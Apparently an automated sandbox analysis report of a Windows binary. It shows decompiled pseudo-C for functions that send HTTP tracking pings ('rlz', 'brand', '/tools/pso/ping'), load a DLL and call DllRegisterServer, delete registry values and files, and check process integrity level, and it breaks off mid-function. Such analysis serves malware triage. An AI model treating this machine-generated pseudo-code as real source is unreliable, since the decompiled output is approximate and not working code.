0x004c2980
0x004c297d
0x004c2986
0x004c298b
0x004c2992
0x004c2998
0x00000000
0x004c2998
0x004c2813
0x004c2770
0x004c2776
0x004c2780
0x004c2780
0x004c2787
0x00000000

APIs

CreateMutexW.KERNEL32(00000000,00000000,{A946A6A9-917E-4949-B9BC-6BADA8C7FD63},09D48295,?,00000008,?,00000001,?,005175FC,000000FF,004C5BE5), ref: 004C271A
WaitForSingleObject.KERNEL32(00000000,00001388,00000008,?,?,00000005,?,?,?), ref: 004C2739

Part of subcall function 004C4B10: RegCloseKey.ADVAPI32(000000FF,?,?,?,?,00000008,?,?,00000005,?,?,?), ref: 004C4B68

RegCloseKey.ADVAPI32(80000001), ref: 004C2780
ReleaseMutex.KERNEL32(00000000), ref: 004C2787
CloseHandle.KERNEL32(00000000), ref: 004C278E
RegCloseKey.ADVAPI32(?), ref: 004C2980
ReleaseMutex.KERNEL32(?), ref: 004C298B
CloseHandle.KERNEL32(?), ref: 004C2992

Strings

brand, xrefs: 004C27CA
%s=%s, xrefs: 004C27AE
&%s=%s, xrefs: 004C27CF, 004C27E8, 004C28E1
/tools/pso/ping, xrefs: 004C293A
{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}, xrefs: 004C270B
pinyin, xrefs: 004C27A4
&%s, xrefs: 004C281D, 004C28A2, 004C2920
%s?%s, xrefs: 004C293F

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Mutex$HandleRelease$CreateObjectSingleWait
String ID: %s=%s$%s?%s$&%s$&%s=%s$/tools/pso/ping$brand$pinyin${A946A6A9-917E-4949-B9BC-6BADA8C7FD63}
API String ID: 3553343216-3469552700
Opcode ID: 6345db18bfc4a35dd045dab51f467e82da2d6009c8ca5b5c8ff4f281d30af730
Instruction ID: 659416fc5c69159fdcabd868b00f6c6f9f86b909beca29153fccabfe5cb85a3f
Opcode Fuzzy Hash: 6345db18bfc4a35dd045dab51f467e82da2d6009c8ca5b5c8ff4f281d30af730
Instruction Fuzzy Hash: 177158392483409BD360EB22DD41FDBB7D4BF99304F04491EF88897391DBB99909CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00457510, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 214
networkCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00457510(WCHAR** __ecx, WCHAR* __edx, void* __ebp, long _a4, intOrPtr* _a8) {
				char _v12;
				signed int _v16;
				long _v36;
				char _v68;
				char _v108;
				long _v544;
				intOrPtr* _v552;
				void* _v568;
				void* _v596;
				long _v624;
				void _v640;
				void _v648;
				intOrPtr* _v656;
				WCHAR* _v660;
				long _v664;
				long _v668;
				long _v680;
				WCHAR* _v684;
				long _v696;
				char _v700;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				signed int _t50;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				void* _t79;
				long _t84;
				void* _t89;
				void* _t91;
				long _t94;
				void* _t95;
				long _t106;
				intOrPtr _t114;
				WCHAR** _t116;
				void* _t117;
				void* _t119;
				void* _t125;
				void* _t127;
				long _t129;
				void* _t132;
				signed int _t133;

				_t113 = __edx;
				_push(0xffffffff);
				_push(0x50fe21);
				_push( *[fs:0x0]);
				_t133 = _t132 - 0x228;
				_t48 =  *0x5596fc; // 0x9d48295
				_v16 = _t48 ^ _t133;
				_t50 =  *0x5596fc; // 0x9d48295
				_push(_t50 ^ _t133);
				 *[fs:0x0] =  &_v12;
				_t129 = _a4;
				_t53 = _a8;
				_t94 = 0;
				_t116 = __ecx;
				_v544 = _t129;
				_v552 = _t53;
				if(_t129 != 0) {
					if(_t53 == 0) {
						goto L1;
					} else {
						E00457850(_t129);
						 *_v552 = 0;
						if(_t116[4] != 0) {
							L7:
							_t113 = _t116[4];
							_t127 = InternetConnectW(_t116[4],  *_t116, _t116[1] & 0x0000ffff, _t94, _t94, 3, _t94, _t94);
							_v568 = _t127;
							_v36 = _t94;
							if(_t127 == _t94) {
								goto L6;
							} else {
								_t106 = 0x400300;
								if(_t116[1] == 0x1bb) {
									_t106 = 0xc00300;
								}
								if(_t116[5] == _t94) {
									_t106 = _t106 | 0x00080000;
								}
								_t119 = HttpOpenRequestW(_t127, _t116[2], _t116[3], L"HTTP/1.1", 0x52fc70, _t94, _t106, _t94);
								_v596 = _t119;
								_v68 = 1;
								if(_t119 != _t94) {
									if(HttpSendRequestW(_t119, _t94, _t94, _t94, _t94) != 0) {
										_v640 = _t94;
										_v624 = 4;
										if(HttpQueryInfoW(_t119, 0x20000013,  &_v640,  &_v624, _t94) == 0) {
											goto L15;
										} else {
											_t114 =  *0x559000; // 0x521840
											_t24 = _t114 + 0xc; // 0x4edeb4
											_v668 =  *((intOrPtr*)( *_t24))() + 0x10;
											_v108 = 2;
											if( &(_v660[0xffffffffffffff9c]) > 0x63) {
												L27:
												L004578B0( &_v668, _t129);
												_t113 = _v660;
												 *_v656 = _v660;
												L004C7B30( &_v668, _v660);
												InternetCloseHandle(_t119);
												InternetCloseHandle(_t127);
												_t54 = 0;
											} else {
												_t113 =  &_v664;
												_v664 = _t94;
												if(InternetQueryDataAvailable(_t119,  &_v664, _t94, _t94) == 0) {
													L25:
													_t79 = E004012C0();
													L004C7B30( &_v684, _t113);
													InternetCloseHandle(_t119);
													InternetCloseHandle(_t127);
													_t54 = _t79;
												} else {
													while(1) {
														_t84 = _v680;
														if(_t84 <= _t94) {
															break;
														}
														_v668 = _t94;
														if(_t84 > 0x200) {
															_t84 = 0x200;
															_v680 = 0x200;
														}
														_t113 =  &_v648;
														if(InternetReadFile(_t119,  &_v648, _t84,  &_v668) != 0) {
															_t113 = _v684;
															E004577A0( &_v700, _v684,  &_v664);
															_t94 = 0;
														}
														if(InternetQueryDataAvailable(_t119,  &_v696, _t94, _t94) != 0) {
															continue;
														} else {
															goto L25;
														}
														goto L28;
													}
													_t129 = _v664;
													goto L27;
												}
											}
										}
									} else {
										L15:
										_t65 = E004012C0();
										InternetCloseHandle(_t119);
										InternetCloseHandle(_t127);
										_t54 = _t65;
									}
								} else {
									_t89 = E004012C0();
									InternetCloseHandle(_t127);
									_t54 = _t89;
								}
							}
						} else {
							_t91 = InternetOpenW(0, 0, 0, 0, 0);
							_t116[4] = _t91;
							if(_t91 != 0 || E004012C0() >= 0) {
								goto L7;
							} else {
								L6:
								_t54 = E004012C0();
							}
						}
					}
				} else {
					L1:
					_t54 = 0x80070057;
				}
				L28:
				 *[fs:0x0] = _v12;
				_pop(_t117);
				_pop(_t125);
				_pop(_t95);
				return L004EEDC9(_t54, _t95, _v16 ^ _t133, _t113, _t117, _t125);
			}

0x00457510
0x00457510
0x00457512
0x0045751d
0x0045751e
0x00457524
0x0045752b
0x00457536
0x0045753d
0x00457545
0x0045754b
0x00457552
0x00457559
0x0045755b
0x0045755d
0x00457561
0x00457567
0x00457575
0x00000000
0x00457577
0x00457579
0x00457582
0x00457587
0x004575ae
0x004575b4
0x004575c6
0x004575c8
0x004575cc
0x004575d5
0x00000000
0x004575d7
0x004575de
0x004575e3
0x004575e5
0x004575e5
0x004575ed
0x004575ef
0x004575ef
0x00457611
0x00457613
0x00457617
0x00457621
0x00457645
0x00457672
0x00457676
0x00457686
0x00000000
0x00457688
0x00457688
0x0045768e
0x0045769b
0x0045769f
0x004576b4
0x0045774a
0x00457750
0x00457755
0x0045775d
0x00457763
0x0045776f
0x00457772
0x00457774
0x004576ba
0x004576c2
0x004576c8
0x004576d0
0x00457726
0x00457726
0x00457731
0x0045773d
0x00457740
0x00457742
0x004576d2
0x004576d2
0x004576d2
0x004576d8
0x00000000
0x00000000
0x004576da
0x004576e3
0x004576e5
0x004576ea
0x004576ea
0x004576f4
0x00457702
0x00457704
0x00457711
0x00457716
0x00457716
0x00457724
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00457724
0x00457746
0x00000000
0x00457746
0x004576d0
0x004576b4
0x00457647
0x00457647
0x00457647
0x00457655
0x00457658
0x0045765a
0x0045765a
0x00457623
0x00457623
0x0045762b
0x00457631
0x00457631
0x00457621
0x00457589
0x0045758e
0x00457594
0x00457599
0x00000000
0x004575a4
0x004575a4
0x004575a4
0x004575a4
0x00457599
0x00457587
0x00457569
0x00457569
0x00457569
0x00457569
0x00457776
0x0045777d
0x00457785
0x00457786
0x00457788
0x0045779d

APIs

InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0045758E

Strings

HTTP/1.1, xrefs: 00457603

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: InternetOpen
String ID: HTTP/1.1
API String ID: 2038078732-1626175334
Opcode ID: cb0ba1f9f8daf258a76d99586bb0cde04d1fa742efa321df2f4efc352827d7bb
Instruction ID: 5c2c636e9fcd2c99e18b37509e7f3f13e8b61ccec9910e3602a43117ec4ee666
Opcode Fuzzy Hash: cb0ba1f9f8daf258a76d99586bb0cde04d1fa742efa321df2f4efc352827d7bb
Instruction Fuzzy Hash: EF719075208245AFD320AF65E884E6BB7E8FF99345F00053EF945D3251E738AD09CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004556D0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 170
registrylibrarystringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004556D0(WCHAR* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				int _t40;
				signed int* _t42;
				signed int _t45;
				intOrPtr* _t46;
				void* _t47;
				_Unknown_base(*)()* _t59;
				void* _t69;
				intOrPtr* _t78;
				short* _t82;
				signed int _t87;
				signed int _t89;
				signed short* _t92;
				intOrPtr* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t103;
				void* _t105;
				void** _t106;
				struct HINSTANCE__* _t107;
				void* _t109;
				signed int _t112;

				_t37 =  *0x5596fc; // 0x9d48295
				_t38 = _t37 ^ _t112;
				 *(_t112 + 0x428) = _t37 ^ _t112;
				_t109 =  *(_t112 + 0x438);
				_t98 = __ecx;
				 *(_t112 + 0x10) = _t109;
				if(__ecx == 0) {
					L35:
					_pop(_t99);
					_pop(_t103);
					_pop(_t69);
					return L004EEDC9(_t38, _t69,  *(_t112 + 0x438) ^ _t112, _t90, _t99, _t103);
				}
				_t40 = lstrlenW(__ecx);
				_t38 = L004F3BE9(_t98, L"/\\*?|\r\n\t \"");
				_t112 = _t112 + 8;
				if(_t38 != _t40) {
					goto L35;
				}
				_t38 = 0x2e;
				if(0x2e ==  *_t98) {
					goto L35;
				} else {
					GetCurrentDirectoryW(0x104, _t112 + 0x224);
					_t92 =  *( *((intOrPtr*)(_t109 + 0x18)) + 0x28);
					_t105 = 0x105;
					_t42 = _t112 + 0x14;
					while(1) {
						_t8 = _t105 + 0x7ffffef9; // 0x7ffffffe
						if(_t8 == 0) {
							break;
						}
						_t89 =  *_t92 & 0x0000ffff;
						if(_t89 == 0) {
							break;
						}
						 *_t42 = _t89;
						_t42 =  &(_t42[0]);
						_t92 =  &(_t92[1]);
						_t105 = _t105 - 1;
						if(_t105 != 0) {
							continue;
						} else {
							L9:
							_t42 = _t42 - 2;
							L10:
							_t93 = 0;
							 *_t42 = 0;
							SetCurrentDirectoryW(_t112 + 0x14);
							_t45 = lstrlenW(_t112 + 0x14);
							if(_t45 == 0 ||  *((short*)(_t112 + 0x12 + _t45 * 2)) != 0x5c) {
								_t93 = 0x105;
								_t46 = _t112 + 0x14;
								while( *_t46 != 0) {
									_t46 = _t46 + 2;
									_t93 = _t93 - 1;
									if(_t93 != 0) {
										continue;
									}
									goto L18;
								}
								if(_t93 != 0) {
									_t87 = 0x105 - _t93;
									_t93 = 0x7fffffff;
									L00453A00(0, _t112 + 0x18 + _t87 * 2, 0x7fffffff, "\\");
								}
								goto L18;
							} else {
								L18:
								_t47 = 0x105;
								_t78 = _t112 + 0x14;
								while( *_t78 != 0) {
									_t78 = _t78 + 2;
									_t47 = _t47 - 1;
									if(_t47 != 0) {
										continue;
									}
									L24:
									_t100 =  *(_t112 + 0x10);
									if(L00454EA0(_t112 + 0x14, _t93, _t100) == 0) {
										_t106 =  *(_t100 + 0x18);
										_t101 = _t106[0x12];
										if(_t101 != 0) {
											_push( *((intOrPtr*)(_t101 + 0x10)));
											E004EF7B8();
											_push(_t101);
											L004EEDBE();
											_t112 = _t112 + 8;
										}
										_t106[0x12] = 0;
										 *((intOrPtr*)(_t112 + 0x34)) = 0;
										if(RegCreateKeyExW( *_t106, _t106[1], 0, 0, 0, 0x20006, 0, _t112 + 0x14, 0) == 0) {
											_t82 =  *0x55b1f8; // 0x53421c
											RegDeleteValueW( *(_t112 + 0x10), _t82);
											RegCloseKey( *(_t112 + 0x10));
										}
										DeleteFileW(_t112 + 0x14);
									} else {
										_t107 = LoadLibraryW(_t112 + 0x14);
										if(_t107 != 0) {
											_t59 = GetProcAddress(_t107, "DllRegisterServer");
											if(_t59 != 0) {
												 *_t59();
											}
											FreeLibrary(_t107);
										}
									}
									_t90 = _t112 + 0x224;
									_t38 = SetCurrentDirectoryW(_t112 + 0x224);
									goto L35;
								}
								if(_t47 != 0) {
									_t93 = 0x7fffffff;
									L00453A00(0, _t112 + 0x18 + (0x105 - _t47) * 2, 0x7fffffff, _t98);
								}
								goto L24;
							}
						}
					}
					if(_t105 != 0) {
						goto L10;
					}
					goto L9;
				}
			}

0x004556d6
0x004556db
0x004556dd
0x004556e6
0x004556ef
0x004556f1
0x004556f7
0x004558c6
0x004558cd
0x004558ce
0x004558d0
0x004558de
0x004558de
0x00455704
0x0045570e
0x00455713
0x00455718
0x00000000
0x00000000
0x0045571e
0x00455726
0x00000000
0x0045572c
0x00455739
0x00455742
0x00455745
0x0045574a
0x00455750
0x00455750
0x00455758
0x00000000
0x00000000
0x0045575a
0x00455760
0x00000000
0x00000000
0x00455762
0x00455765
0x00455768
0x0045576b
0x0045576c
0x00000000
0x0045576e
0x00455774
0x00455774
0x00455777
0x0045577d
0x0045577f
0x00455787
0x0045578e
0x00455794
0x0045579e
0x004557a3
0x004557a7
0x004557ac
0x004557af
0x004557b0
0x00000000
0x00000000
0x00000000
0x004557b2
0x004557b6
0x004557bd
0x004557cf
0x004557d4
0x004557d4
0x00000000
0x004557d9
0x004557d9
0x004557d9
0x004557de
0x004557e2
0x004557e7
0x004557ea
0x004557eb
0x00000000
0x00000000
0x00455810
0x00455810
0x0045581f
0x00455851
0x00455854
0x00455859
0x0045585e
0x0045585f
0x00455864
0x00455865
0x0045586a
0x0045586a
0x00455883
0x00455886
0x00455892
0x00455894
0x004558a0
0x004558ab
0x004558ab
0x004558b6
0x00455821
0x0045582c
0x00455830
0x0045583c
0x00455844
0x00455846
0x00455846
0x00455849
0x00455849
0x00455830
0x004558bc
0x004558c4
0x00000000
0x004558c4
0x004557f1
0x00455806
0x0045580b
0x0045580b
0x00000000
0x004557f1
0x00455794
0x0045576c
0x00455772
0x00000000
0x00000000
0x00000000
0x00455772

APIs

lstrlenW.KERNEL32(?,?,?,?,?), ref: 00455704
_wcscspn.LIBCMT ref: 0045570E
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00455739
SetCurrentDirectoryW.KERNEL32(?), ref: 00455787
lstrlenW.KERNEL32(?), ref: 0045578E
LoadLibraryW.KERNEL32(?), ref: 00455826
GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 0045583C
FreeLibrary.KERNEL32(00000000), ref: 00455849
RegCreateKeyExW.ADVAPI32(00000000,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0045588A
RegDeleteValueW.ADVAPI32(?,0053421C), ref: 004558A0
RegCloseKey.ADVAPI32(?), ref: 004558AB
DeleteFileW.KERNEL32(?), ref: 004558B6
SetCurrentDirectoryW.KERNEL32(?), ref: 004558C4

Strings

DllRegisterServer, xrefs: 00455836
\, xrefs: 00455796
/\*?| ", xrefs: 00455706

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory$DeleteLibrarylstrlen$AddressCloseCreateFileFreeLoadProcValue_wcscspn
String ID: /\*?| "$DllRegisterServer$\
API String ID: 845541531-2510004300
Opcode ID: d63e16144128a6228ccd71559f1d155f94567208f285e329e2a4568be9b551b9
Instruction ID: 196b6e435319e0d2fb4ef869fc93a8ab4e7dbe8f5c03193b39a64d6980165c70
Opcode Fuzzy Hash: d63e16144128a6228ccd71559f1d155f94567208f285e329e2a4568be9b551b9
Instruction Fuzzy Hash: 5F51E372500B01DBC320EF65D8A597B73A5EFA8712F54092EF94287241E738ED4DCB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004C7400, Relevance: 27.1, APIs: 18, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E004C7400(void* __edx, void* __eflags, void* _a4) {
				long _v4;
				void* _v8;
				long _v12;
				void* _v16;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				void* _t22;
				void* _t31;
				signed int _t34;
				void* _t35;
				signed int _t39;
				void* _t40;
				void* _t45;
				signed char _t56;
				void* _t58;
				signed int _t60;
				void* _t61;
				void* _t62;
				signed int _t63;

				 *0x55ffa0 = 0;
				if(E004C76D0(_t45, __edx, _t58, _t61) != 0) {
					_v8 = 0;
					if(OpenProcessToken(_a4, 0x18,  &_v8) != 0) {
						SetLastError(0);
						_v4 = 0;
						GetTokenInformation(_v8, 0x19, 0, 0,  &_v4);
						if(GetLastError() == 0x7a) {
							_t21 = _v8;
							if(0 > 0 || 0 >= 0 && _t21 > 0xffffffff) {
								L15:
								__imp__CoTaskMemFree(0);
								_t22 = _v16;
								if(_t22 != 0) {
									CloseHandle(_t22);
								}
								return 0x8007000e;
							} else {
								__imp__CoTaskMemAlloc(_t21);
								_t62 = _t21;
								if(_t62 != 0) {
									if(GetTokenInformation(_v16, 0x19, _t62, _v12,  &_v12) != 0) {
										_t56 =  *(GetSidSubAuthorityCount( *_t62)) - 1;
										if( *(GetSidSubAuthority( *_t62, _t56 & 0x000000ff)) >= 0x2000) {
											asm("sbb edx, edx");
											 *0x55ffa0 = _t56 + 3;
										} else {
											 *0x55ffa0 = 1;
										}
										__imp__CoTaskMemFree(_t62);
										_t31 = _v24;
										if(_t31 != 0) {
											CloseHandle(_t31);
										}
										return 0;
									} else {
										_t34 = GetLastError();
										if(_t34 > 0) {
											_t34 = _t34 & 0x0000ffff | 0x80070000;
										}
										_t60 = _t34;
										__imp__CoTaskMemFree(_t62);
										_t35 = _v24;
										if(_t35 != 0) {
											CloseHandle(_t35);
										}
										return _t60;
									}
								} else {
									goto L15;
								}
							}
						} else {
							_t39 = GetLastError();
							goto L4;
						}
					} else {
						_t39 = GetLastError();
						L4:
						if(_t39 > 0) {
							_t39 = _t39 & 0x0000ffff | 0x80070000;
						}
						_t63 = _t39;
						_t40 = _v12;
						if(_t40 != 0) {
							CloseHandle(_t40);
						}
						return _t63;
					}
				} else {
					return 0x80004005;
				}
			}

0x004c7406
0x004c7417
0x004c7431
0x004c7441
0x004c7473
0x004c748f
0x004c7497
0x004c74a4
0x004c74ac
0x004c74b0
0x004c74c6
0x004c74c8
0x004c74ce
0x004c74d4
0x004c74d7
0x004c74d7
0x004c74e8
0x004c74b9
0x004c74ba
0x004c74c0
0x004c74c4
0x004c74ff
0x004c753f
0x004c7553
0x004c7566
0x004c756b
0x004c7555
0x004c7555
0x004c7555
0x004c7572
0x004c7578
0x004c757e
0x004c7581
0x004c7581
0x004c758f
0x004c7501
0x004c7501
0x004c7505
0x004c750c
0x004c750c
0x004c7512
0x004c7514
0x004c751a
0x004c7520
0x004c7523
0x004c7523
0x004c7531
0x004c7531
0x00000000
0x00000000
0x00000000
0x004c74c4
0x004c74a6
0x004c74a6
0x00000000
0x004c74a6
0x004c7443
0x004c7443
0x004c7449
0x004c744b
0x004c7452
0x004c7452
0x004c7457
0x004c7459
0x004c745f
0x004c7462
0x004c7462
0x004c7470
0x004c7470
0x004c7419
0x004c7424
0x004c7424

APIs

Part of subcall function 004C76D0: _memset.LIBCMT ref: 004C76F9
Part of subcall function 004C76D0: VerSetConditionMask.KERNEL32 ref: 004C7719
Part of subcall function 004C76D0: VerifyVersionInfoW.KERNEL32(00000000,00000002,00000000), ref: 004C7728

OpenProcessToken.ADVAPI32 ref: 004C7439
GetLastError.KERNEL32 ref: 004C7443
CloseHandle.KERNEL32(?), ref: 004C7462

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseConditionErrorHandleInfoLastMaskOpenProcessTokenVerifyVersion_memset
String ID:
API String ID: 3114600267-0
Opcode ID: 6eebfb4e3a3d6009bb2ff1e7b8ababfc7de579141a663193ccd5780158b2a10d
Instruction ID: 95c0111a7d7f7b4f9f6eb780a149b86f90f49d49f15a67e38097c5e8f375ed40
Opcode Fuzzy Hash: 6eebfb4e3a3d6009bb2ff1e7b8ababfc7de579141a663193ccd5780158b2a10d
Instruction Fuzzy Hash: 4041AC796086029BD720DF24EC48F6B7BE8EFA5761F14492AF940C3650D738D80D9B6A

Uniqueness

Uniqueness Score: -1.00%

Function 004C5030, Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 225
synchronizationregistryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004C5030(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t66;
				signed int _t68;
				void* _t73;
				char _t75;
				void* _t78;
				void* _t82;
				void* _t90;
				void* _t94;
				signed int** _t97;
				void*** _t99;
				void* _t100;
				void* _t111;
				void* _t114;
				WCHAR* _t118;
				void* _t121;
				void* _t125;
				void* _t126;
				void* _t141;
				signed int _t146;
				void* _t151;
				void* _t152;
				void* _t155;
				void* _t158;
				void* _t159;
				void* _t163;
				void* _t164;
				signed int _t169;
				void* _t170;
				signed int _t171;
				signed int _t172;
				void* _t174;

				_t174 = __eflags;
				_t143 = __edx;
				_push(0xffffffff);
				_push(0x517412);
				_push( *[fs:0x0]);
				_t171 = _t170 - 0x1bc;
				_t66 =  *0x5596fc; // 0x9d48295
				 *(_t171 + 0x1b8) = _t66 ^ _t171;
				_t68 =  *0x5596fc; // 0x9d48295
				_push(_t68 ^ _t171);
				 *[fs:0x0] = _t171 + 0x1d0;
				_t151 = __ecx;
				_t125 = __edx;
				 *((intOrPtr*)(_t171 + 0x44)) = __ecx;
				 *__edx = 0;
				 *((char*)(_t171 + 0x3c)) = 0;
				_t158 = CreateMutexW(0, 0, L"{A946A6A9-917E-4949-B9BC-6BADA8C7FD63}");
				_push(_t158);
				 *(_t171 + 0x38) = _t158;
				_t73 = L004C5D10(_t143, _t174);
				_t172 = _t171 + 4;
				if(_t73 != 0) {
					 *(_t172 + 0x30) = WaitForSingleObject(_t158, 0x1388) == 0;
				}
				 *((intOrPtr*)(_t172 + 0x1d8)) = 0;
				if( *(_t172 + 0x30) == 0) {
					L8:
					CloseHandle(_t158);
					_t75 = 0;
					goto L32;
				} else {
					 *(_t172 + 0x20) = 0x80000001;
					 *((char*)(_t172 + 0x1d8)) = 1;
					if(E004C75E0() == 0) {
						__eflags = _t151;
						if(_t151 == 0) {
							goto L4;
						}
						E004C8730(L"rep=2", _t172 + 0x28);
						 *((char*)(_t172 + 0x1d8)) = 2;
						_t143 =  *(_t172 + 0x28);
						_t153 = _t172 + 0x2c;
						 *(_t172 + 0x2c) = 0;
						_t82 = L004C7AA0(_t125,  *(_t172 + 0x28), _t172 + 0x2c);
						__eflags = _t82;
						if(_t82 == 0) {
							L35:
							L004C8A50(_t172 + 0x28, _t143);
							L004C7B10(_t172 + 0x20);
							L004C5DF0(_t172 + 0x30);
							_t75 = 0;
							L32:
							 *[fs:0x0] =  *((intOrPtr*)(_t172 + 0x1d0));
							_pop(_t152);
							_pop(_t159);
							_pop(_t126);
							return L004EEDC9(_t75, _t126,  *(_t172 + 0x1b8) ^ _t172, _t143, _t152, _t159);
						}
						L0040CC20(_t172 + 0x24);
						 *((char*)(_t172 + 0x1e0)) = 3;
						L004C7EF0(_t172 + 0x24, L"&%s=", L"rlz");
						_t143 =  *(_t172 + 0x2c);
						_t172 = _t172 + 8;
						_t90 = L004C7AA0(_t125, _t143, _t153);
						__eflags = _t90;
						if(_t90 == 0) {
							L34:
							L004C8A50(_t172 + 0x24, _t143);
							goto L35;
						}
						_t162 =  *(_t172 + 0x38);
						_t169 = 0;
						 *((char*)(_t172 + 0x1b)) = 1;
						__eflags =  *( *(_t172 + 0x38));
						if(__eflags == 0) {
							L20:
							 *((short*)(_t172 + 0xc4)) = 0;
							_t94 = L004C6D40(_t172 + 0xc4, _t143, __eflags);
							__eflags = _t94;
							if(_t94 == 0) {
								L24:
								 *((short*)(_t125 +  *(_t172 + 0x2c) * 2)) = 0;
								 *((char*)(_t172 + 0x1d8)) = 2;
								_t97 =  *((intOrPtr*)(_t172 + 0x24)) + 0xfffffff0;
								asm("lock xadd [ecx], edx");
								_t146 = 0xfffffffffffffffe;
								__eflags = 0xffffffff;
								if(0xffffffff <= 0) {
									_t146 =  *( *_t97);
									 *((intOrPtr*)( *((intOrPtr*)(_t146 + 4))))(_t97);
								}
								 *((char*)(_t172 + 0x1d8)) = 1;
								_t99 =  *(_t172 + 0x28) + 0xfffffff0;
								asm("lock xadd [ecx], edx");
								_t143 = (_t146 | 0xffffffff) - 1;
								__eflags = (_t146 | 0xffffffff) - 1;
								if((_t146 | 0xffffffff) - 1 <= 0) {
									_t143 =  *( *_t99);
									 *((intOrPtr*)( *((intOrPtr*)( *( *_t99) + 4))))(_t99);
								}
								_t100 =  *(_t172 + 0x20);
								__eflags = _t100;
								if(_t100 != 0) {
									__eflags = _t100 - 0x80000001;
									if(_t100 != 0x80000001) {
										RegCloseKey(_t100);
									}
								}
								_t163 =  *(_t172 + 0x34);
								ReleaseMutex(_t163);
								CloseHandle(_t163);
								_t75 = 1;
								goto L32;
							}
							__eflags =  *((short*)(_t172 + 0xc4));
							if( *((short*)(_t172 + 0xc4)) == 0) {
								goto L24;
							}
							_t164 = _t172 + 0x1c;
							L0040CC20(_t164);
							_push(_t172 + 0xc4);
							 *((char*)(_t172 + 0x1e4)) = 5;
							L004C7EF0(_t164, L"&%s=%s", L"dcc");
							_t143 =  *(_t172 + 0x28);
							_t172 = _t172 + 0xc;
							_t111 = L004C7AA0(_t125, _t143, _t172 + 0x2c);
							_t141 = _t164;
							__eflags = _t111;
							if(_t111 == 0) {
								L33:
								L004C8A50(_t141, _t143);
								goto L34;
							}
							L004C8A50(_t141, _t143);
							goto L24;
						} else {
							goto L13;
						}
						do {
							L13:
							_t114 = L004C4B10( *_t162, __eflags, _t172 + 0x3c);
							_t172 = _t172 + 4;
							__eflags = _t114;
							if(_t114 == 0) {
								goto L19;
							}
							_t155 = L004C5E10( *_t162);
							__eflags = _t155;
							if(_t155 == 0) {
								goto L19;
							}
							L0040CC20(_t172 + 0x1c);
							__eflags =  *((char*)(_t172 + 0x1b));
							 *((char*)(_t172 + 0x1d8)) = 4;
							_t118 = 0x52fc70;
							if( *((char*)(_t172 + 0x1b)) == 0) {
								_t118 = ",";
							}
							_push(_t172 + 0x3c);
							_push(":");
							_push(_t155);
							L004C7EF0(_t172 + 0x30, L"%s%s%s%s", _t118);
							_t143 =  *(_t172 + 0x30);
							_t172 = _t172 + 0x14;
